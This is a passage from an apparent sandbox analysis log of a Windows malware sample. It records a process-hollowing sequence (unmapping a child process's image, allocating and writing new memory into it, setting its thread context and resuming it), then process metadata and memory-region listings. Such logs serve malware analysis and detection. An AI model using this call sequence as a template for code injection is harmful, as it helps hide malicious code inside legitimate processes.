[477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0170.600] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0170.600] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0170.701] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0170.709] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3ec15a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3ec15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.727] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3ec19a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3ec19a0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.771] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3f8bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3f8bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.831] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3fc9ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3fc9ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.850] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3fcffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3fcffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.872] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3fd01a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3fd01a0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.886] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3ec16ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3ec16ec*, lpNumberOfBytesWritten=0x0) returned 1 [0170.886] SetThreadContext (hThread=0x74, lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76fb01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0170.887] ResumeThread (hThread=0x74) returned 0x1 [0170.934] CloseHandle (hObject=0x74) returned 1 [0170.956] CloseHandle (hObject=0x78) returned 1 [0170.956] ExitProcess (uExitCode=0x0) [0170.957] HeapFree (in: hHeap=0x4030000, dwFlags=0x0, lpMem=0x40307d0 | out: hHeap=0x4030000) returned 1 Process: id = "12" image_name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" page_root = "0xb71c000" os_pid = "0x7d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x768" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f504" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1901 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1902 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1903 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1904 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1905 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1906 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1907 start_va = 0x400000 end_va = 0x253dfff monitored = 1 entry_point = 0x4984b0 region_type = mapped_file name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") Region: id = 1908 start_va = 0x76dc0000 end_va = 0x76f68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1909 start_va = 0x76fa0000 end_va = 0x7711ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1910 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1911 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1912 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1913 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1914 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1915 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1916 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1918 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1919 start_va = 0x1a0000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1920 start_va = 0x73730000 end_va = 0x7376efff monitored = 0 entry_point = 0x7375e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1921 start_va = 0x736d0000 end_va = 0x7372bfff monitored = 0 entry_point = 0x7370f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1922 start_va = 0x736c0000 end_va = 0x736c7fff monitored = 0 entry_point = 0x736c20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1923 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 0 entry_point = 0x76cb5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1924 start_va = 0x76600000 end_va = 0x7670ffff monitored = 0 entry_point = 0x76613283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1925 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 0 entry_point = 0x76cb5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1926 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076ca0000" filename = "" Region: id = 1927 start_va = 0x76ba0000 end_va = 0x76c99fff monitored = 0 entry_point = 0x76bba2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1928 start_va = 0x76ba0000 end_va = 0x76c99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076ba0000" filename = "" Region: id = 1929 start_va = 0x270000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1930 start_va = 0x76600000 end_va = 0x7670ffff monitored = 0 entry_point = 0x76613283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1931 start_va = 0x74f50000 end_va = 0x74f96fff monitored = 0 entry_point = 0x74f574c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1932 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1933 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1934 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1935 start_va = 0x540000 end_va = 0x5a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1936 start_va = 0x75100000 end_va = 0x751effff monitored = 0 entry_point = 0x75110569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1937 start_va = 0x74af0000 end_va = 0x74b4ffff monitored = 0 entry_point = 0x74b0a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1938 start_va = 0x74fa0000 end_va = 0x7504bfff monitored = 0 entry_point = 0x74faa472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1939 start_va = 0x74ae0000 end_va = 0x74aebfff monitored = 0 entry_point = 0x74ae10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1940 start_va = 0x75050000 end_va = 0x75068fff monitored = 0 entry_point = 0x75054975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1941 start_va = 0x74a10000 end_va = 0x74a21fff monitored = 0 entry_point = 0x74a11200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1942 start_va = 0x76aa0000 end_va = 0x76b94fff monitored = 0 entry_point = 0x76aa1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1943 start_va = 0x74dc0000 end_va = 0x74e16fff monitored = 0 entry_point = 0x74dd9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1944 start_va = 0x75910000 end_va = 0x7599ffff monitored = 0 entry_point = 0x75926343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1945 start_va = 0x74e50000 end_va = 0x74f4ffff monitored = 0 entry_point = 0x74e6b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1946 start_va = 0x75610000 end_va = 0x756affff monitored = 0 entry_point = 0x756249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1947 start_va = 0x76f70000 end_va = 0x76f79fff monitored = 0 entry_point = 0x76f736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1948 start_va = 0x756b0000 end_va = 0x7574cfff monitored = 0 entry_point = 0x756e3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1949 start_va = 0x75270000 end_va = 0x753a5fff monitored = 0 entry_point = 0x75271b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1950 start_va = 0x75750000 end_va = 0x758abfff monitored = 0 entry_point = 0x7579ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1951 start_va = 0x768b0000 end_va = 0x7693efff monitored = 0 entry_point = 0x768b3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1952 start_va = 0x76970000 end_va = 0x76a90fff monitored = 0 entry_point = 0x7697158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1953 start_va = 0x74e20000 end_va = 0x74e2bfff monitored = 0 entry_point = 0x74e2238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1954 start_va = 0x74b50000 end_va = 0x74d4afff monitored = 0 entry_point = 0x74b522d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1955 start_va = 0x74a90000 end_va = 0x74ac1fff monitored = 0 entry_point = 0x74a937f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1956 start_va = 0x759a0000 end_va = 0x765e9fff monitored = 0 entry_point = 0x75a21601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1957 start_va = 0x74a70000 end_va = 0x74a8bfff monitored = 0 entry_point = 0x74a7a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1958 start_va = 0x74e30000 end_va = 0x74e35fff monitored = 0 entry_point = 0x74e31782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1959 start_va = 0x74a60000 end_va = 0x74a66fff monitored = 0 entry_point = 0x74a6128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1960 start_va = 0x75570000 end_va = 0x755a4fff monitored = 0 entry_point = 0x7557145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1961 start_va = 0x749c0000 end_va = 0x74a03fff monitored = 0 entry_point = 0x749d63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1962 start_va = 0x5b0000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1963 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1964 start_va = 0x640000 end_va = 0x7c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1965 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1966 start_va = 0x75510000 end_va = 0x7556ffff monitored = 0 entry_point = 0x7552158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1967 start_va = 0x753b0000 end_va = 0x7547bfff monitored = 0 entry_point = 0x753b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1968 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 